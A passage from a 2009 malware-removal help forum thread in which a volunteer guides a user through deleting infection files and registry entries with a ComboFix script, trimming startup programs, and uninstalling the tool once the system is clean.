C:\zI0qFTh.bat
c:\documents and settings\default\Application Data\tvmcwrd.dll
c:\documents and settings\default\Application Data\tvmknwrd.dll
c:\windows\SYSTEM32\E110B07331.sys
c:\unoQBHkg.exe
Registry::
[HKEY_USERS\.DEFAULT\software\microsoft\windows\Currentversion\policies\explorer\Run]
"MsnHost"=-
"MsnLoad"=-
"MsnConvert"=-
"Msn"=-

Save this as txtfile CFScript

Then drag the CFScript into ComboFix.exe as you see in the screenshot below.

Posted Image

This will start ComboFix again. Upon reboot, (in case it asks to reboot), post the contents of the Combofix log in your next reply, as well as a fresh DDS log.

Still having problems ?

Greetings,
Thunder
Whatever happens, make believe it was intended to ...
-----------------------------------------------------------------------
Posted Image - If I have helped you in any way, please consider a donation to help me continue the fight against malware.
-----------------------------------------------------------------------
Stand Up & Be Counted --> Posted Image <-- And make a difference

#5 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 30 January 2009 - 08:32 AM

Files are still in root. Logs attached.

Kevin

Attached Files



#6 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 30 January 2009 - 11:35 AM

Hello Kdt2121,

When you look at the date, you'll see most of them are files that were present before, but couldn't be logged anymore because of the amount of files.

Can you remove them manually, using Windows Explorer,
reboot and run ComboFix again (without any script).
Let's see if they will return in such large numbers now.

Greetings,
Thunder
Whatever happens, make believe it was intended to ...
-----------------------------------------------------------------------
Posted Image - If I have helped you in any way, please consider a donation to help me continue the fight against malware.
-----------------------------------------------------------------------
Stand Up & Be Counted --> Posted Image <-- And make a difference

#7 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 30 January 2009 - 07:42 PM

I deleted all the files from the root.

I rebooted and ran combo fix. It said it had expired and would run in limited functionality mode. I deleted it and downloaded a fresh copy but it did the same thing.

Log is attached.

as of this email I do not see them back in the root. Do you think we're in the clear??

Also, did you notice any processes running that were just unneccesary?

thanks for your help.

Kevin

Attached Files



#8 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 31 January 2009 - 07:21 PM

Hello Kdt2121,

Your log looks fine now,
seems like we got them now. :thumbup2:

These processes do not need to start up with Windows, and can be unckecked in Msconfig :DSentry.exe
NvMcTray.dll
igfxtray.exe
igfxpers.exe
qttask.exe
realsched.exe
You can remove all used tools and folders created in the process.
To remove ComboFix :
Go to Start > Run, and copy and paste next command in the field:ComboFix /u
Make sure there's a space between Combofix and /u
Then press Enter.
This will uninstall Combofix, delete its related folders and files, restore your clock settings, hide file extensions, hide the system/hidden files and resets System Restore again.

No more problems ?

Greetings,
Thunder
Whatever happens, make believe it was intended to ...
-----------------------------------------------------------------------
Posted Image - If I have helped you in any way, please consider a donation to help me continue the fight against malware.
-----------------------------------------------------------------------
Stand Up & Be Counted --> Posted Image <-- And make a difference

#9 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 02 February 2009 - 05:56 PM

I have uninstalled combo fix.

I also uninstalled and reinstalled the Trend Micro Suite. (somehow the spam toolbar got uninstalled in outlook)

Everything seems to be running fine. No more entries in processes or root.

Thanks for your help.

Kevin

#10 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 03 February 2009 - 03:07 AM

Glad we could help, Kevin :thumbup2:

Please read this Prevention page with lots of info and tips how to prevent this in the future.
And if you want to improve speed/system performance after malware removal, take a look here.
Extra note: Make sure your programs are up to date - because older versions may contain Security Leaks.
To find out what programs need to be updated, please run the Secunia Software Inspector Scan.

Please also read Tony Klein's excellent article: How I got Infected in the First Place
and/or Grinlers tutorial on how malware is hidden and installed

Since this issue appears resolved ... this Topic is closed.
If you need this topic reopened for continuations of existing problems, please request this by sending me a PM with the address of the thread. This applies only to the original topic starter.

Everyone else please begin a New Topic.
Whatever happens, make believe it was intended to ...
-----------------------------------------------------------------------
Posted Image - If I have helped you in any way, please consider a donation to help me continue the fight against malware.
-----------------------------------------------------------------------
Stand Up & Be Counted --> Posted Image <-- And make a difference




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users